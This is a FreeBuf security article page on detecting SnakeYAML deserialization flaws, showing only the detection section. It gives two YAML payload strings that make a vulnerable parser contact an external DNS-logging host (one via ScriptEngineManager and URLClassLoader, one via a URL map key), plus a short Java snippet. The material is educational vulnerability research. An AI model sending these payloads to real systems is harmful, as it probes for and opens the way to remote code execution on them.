SnakeYaml从漏洞探测到利用姿势 - FreeBuf网络安全行业门户

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户，每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序把安全装进口袋

漏洞

^{0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9}

SnakeYaml从漏洞探测到利用姿势

RoboTerh 2023-01-05 23:23:02 356132

所属地四川省

本文由 RoboTerh 创作，已纳入「FreeBuf原创奖励计划」，未授权禁止转载

反序列化探测

使用URLClassLoader探测

String poc = "!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL [\"http://tcbua9.ceye.io/\"]]]]";

使用Key调用hashCode方法探测

外部探测漏洞点

String poc = "{!!java.net.URL [\"http://tcbua9.ceye.io/\"]: 1}";

我们根据urldns链可以知道key会进行hashCode方法的调用，之后进行urldns的解析

SnakeYaml在进行map的处理的时候将会对key进行hashCode处理，所以我们尝试map的格式

HashMap hashMap = new HashMap();
    hashMap.put("a", "a");
    hashMap.put("b", "b");
    System.out.println(yaml.dump(hashMap));
// {a: a, b: b}

所以我们就可以按照这种使用{ }包裹的形式构造map，然后将指定的URL置于key位置

# 网络安全 # 漏洞分析

RoboTerh

Q 2865153524

已在FreeBuf发表 39 篇文章

本文为 RoboTerh 独立观点，未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件，请联系 FreeBuf 客服小蜜蜂（微信：freebee1024）

被以下专辑收录，发现更多精彩内容

+ 收入我的专辑

+ 加入我的收藏

展开更多

相关推荐

简单打靶场之billu_b0x2 原创

Web安全

简简单单打靶场之billu_b0x2

进击的HACK

107734围观 · 10喜欢 2022-09-06

WINGFUZZ SaaS：在线智能模糊测试平台

资讯

作为国内首个模糊测试SaaS服务平台，当前已开放beta版免费注册使用。

FB客服

225653围观 · 6收藏 · 25喜欢 2022-09-05

揭开业务安全最大威胁的“神秘面纱” 原创

其他

类似信息泄露、撞库盗号、垃圾内容、活动作弊等都是因企业忽视业务安全而出现的问题。

GEETEST极验

137126围观 2022-09-05

VnlnHub CHRONOS 1 原创

Web安全

涉及知识包括：端口服务探测、解编码、命令注入、nc串联、linux本地提权、框架漏洞利用等

xiaopanghacker

135593围观 · 1收藏 · 11喜欢 2022-09-03

VnlnHub BOREDHACKERBLOG CLOUD AV 原创

付费

Web安全

涉及知识包括：端口服务探测、sql注入、命令注入、nc串联、python反弹shell、密码爆破、linux本地提权等

xiaopanghacker

121189围观 · 5喜欢 2022-09-03

RoboTerh LV.5

Q 2865153524

39 文章数
93 关注者

JSP型内存马的原理学习与实现

2023-09-08

攻防渗透 | WebsocketAndTimer内存马的查杀分析和代码实现

2023-07-16

ExecutorAndUpgrade内存马的查杀分析和代码实现

2023-07-05

文章目录